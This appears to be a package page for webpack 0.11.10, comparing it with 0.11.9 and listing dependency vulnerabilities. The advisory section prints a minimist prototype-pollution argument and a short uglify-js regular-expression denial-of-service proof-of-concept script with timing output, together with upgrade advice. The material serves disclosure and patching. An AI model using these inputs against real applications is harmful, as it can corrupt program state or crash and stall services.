Webpack version 0.11.10 is a minor update to the module bundler, released on December 3rd, 2013, shortly after version 0.11.9 which came out on November 27th, 2013. Both versions offer the same core functionality: packing CommonJs, AMD, and Labeled Modules for browser deployment and code splitting for on-demand loading. They also maintain identical development dependencies. This includes testing frameworks like Mocha and Should, web servers like Express, and a suite of loaders crucial for processing various file types such as CSS, JSON, Jade (now Pug), LESS, CoffeeScript, and more. The loaders supported allow developers to seamlessly integrate different asset types into their JavaScript applications, streamlining the build process.
The dependency lists for the two versions remain the same. Developers already using webpack in November/December 2013 would not necessarily be getting any new features or bug fixes upgrading from 0.11.9 to 0.11.10, based on the data provided. For developers new to webpack at that time, either version offered a robust and flexible solution for managing complex JavaScript projects, facilitating modular development and optimized asset delivery within web applications, making either a good choice for getting started. The library allows for preprocessing files via a wide array of loaders.
All the vulnerabilities related to the version 0.11.10 of the package
Prototype Pollution in minimist
Affected versions of minimist are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --__proto__.y=Polluted adds a y property with value Polluted to all objects. The argument --__proto__=Polluted raises and uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to minimist.
Upgrade to versions 0.2.1, 1.2.3 or later.
Prototype Pollution in minimist
Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.